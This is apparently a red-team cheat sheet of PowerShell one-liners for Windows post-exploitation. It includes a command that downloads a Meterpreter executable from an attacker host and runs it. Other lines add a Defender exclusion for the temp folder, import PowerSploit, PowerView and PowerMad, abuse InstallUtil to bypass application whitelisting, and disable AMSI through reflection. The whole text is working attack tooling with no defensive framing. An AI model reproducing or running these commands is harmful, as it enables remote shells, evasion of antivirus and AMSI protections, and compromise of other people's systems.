Powershell Download and Execute Meterpreter
powershell invoke-webrequest - uri http:// 192.168 .x.x/ SI.exe - outfile C:\windows\temp\x.exe ; C:\windows\temp\x.exe
Add AV Exception To A Folder
Add-MpPreference - ExclusionPath " C:\windows\temp\"
Export PowerSploit and Import
Expand-Archive - Path C:\windows\temp\PowerSploit.zip - Destinationpath C:\windows\temp\;Import-Module C:\windows\temp\PowerSploit\powersploit.psd1;Import-Module C:\windows\temp\PowerSploit\Recon\PowerView.ps1;
Export PowerMad and Import
Expand-Archive - Path C:\windows\temp\PowerMad.zip - Destinationpath C:\windows\temp\;Import-Module C:\windows\temp\PowerMad\PowerMad.ps1;
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319 \\InstallUtil.exe / logfile= / LogToConsole= false / U C:\\windows\\temp\\EXEHERE
$a = [Ref ].Assembly.GetTypes() ; Foreach ($b in $a ) {if ($b.Name -like " *iUtils" ) {$c = $b }}; $d = $c.GetFields (' NonPublic,Static' ) ; Foreach ($e in $d ) {if ($e.Name -like " *initFailed" ) {$f = $e }} ; $f.SetValue ($null , $true )